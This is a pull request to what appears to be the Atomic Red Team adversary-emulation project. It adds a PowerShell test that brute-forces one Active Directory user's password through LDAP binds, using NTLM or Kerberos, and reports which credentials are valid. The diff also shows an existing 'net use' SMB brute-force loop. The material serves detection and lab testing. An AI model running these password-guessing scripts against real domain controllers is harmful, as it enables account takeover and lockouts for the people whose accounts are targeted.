### PR TITLE
T1110.001: add test "Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)"

### DIFF
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -1,7 +1,7 @@
 attack_technique: T1110.001
 display_name: 'Brute Force: Password Guessing'
 atomic_tests:
-- name: Brute Force Credentials
+- name: Brute Force Credentials of all domain users via SMB
   auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224
   description: |
     Creates username and password files then attempts to brute force on remote host
@@ -32,3 +32,52 @@ atomic_tests:
       echo "1q2w3e4r" >> #{input_file_passwords}
       echo "Password!" >> #{input_file_passwords}
       @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
+- name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
+  auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
+  description: |
+    Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos
+  supported_platforms:
+  - windows
+  input_arguments:
+    user:
+      description: Account to bruteforce
+      type: String
+      default: bruce.wayne
+    passwords:
+      description: List of passwords we will attempt to brute force with
+      type: String
+      default: Password1`n1q2w3e4r`nPassword!
+    domain:
+      description: Domain FQDN
+      type: String
+      default: contoso.com
+    auth:
+      description: authentication method to choose between "NTLM" and "Kerberos"
+      type: string
+      default: NTLM
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) {
+        Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
+        exit 1
+      }
+
+      [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
+      $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389)
+
+      $passwords = "#{passwords}".split("{`n}")
+      foreach ($password in $passwords){
+        $credz = new-object System.Net.NetworkCredential("#{user}", $password, "#{domain}")
+        $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})
+        try {
+          Write-Host " [-] Attempting ${password} on account #{user}."
+          $conn.bind()
+          # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+          Write-Host " [!] #{user}:${password} are valid credentials!"
+        } catch {
+          Write-Host $_.Exception.Message
+        }
+      }
+      Write-Host "End of bruteforce"


### PR DESCRIPTION
**Details:**
Add a new bruteforce test. This variant uses builtin API against LDAP and allows to choose between NTLM and Kerberos
Similar to #1349

You'll notice that I already included a GUID because I needed to reference it elsewhere. It is randomly generated and not already used in the project. I hope you don't mind :)

You can find me on the ART Slack if you want to discuss this!

**Testing:**
Tested in an AD lab

**Associated Issues:**
None